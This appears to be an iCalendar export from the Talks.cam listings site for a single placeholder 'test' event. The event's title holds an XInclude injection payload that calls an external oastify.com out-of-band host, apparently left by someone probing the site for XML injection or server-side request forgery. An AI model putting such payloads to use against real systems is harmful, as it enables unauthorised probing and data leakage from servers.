BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Talks.cam//talks.cam.ac.uk//
X-WR-CALNAME:Talks.cam
BEGIN:VEVENT
SUMMARY:test - <ivt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include
  href="http://nqh3g9gfhufcvyatjj3oru9bs2ywmnjbkzcm7aw.oastify.com/foo"/></
 ivt>
DTSTART:20260416T110000Z
DTEND:20260416T130000Z
UID:TALK248350@talks.cam.ac.uk
CONTACT:1 Raven
DESCRIPTION:<p>test	</p>
LOCATION:tbc
END:VEVENT
END:VCALENDAR
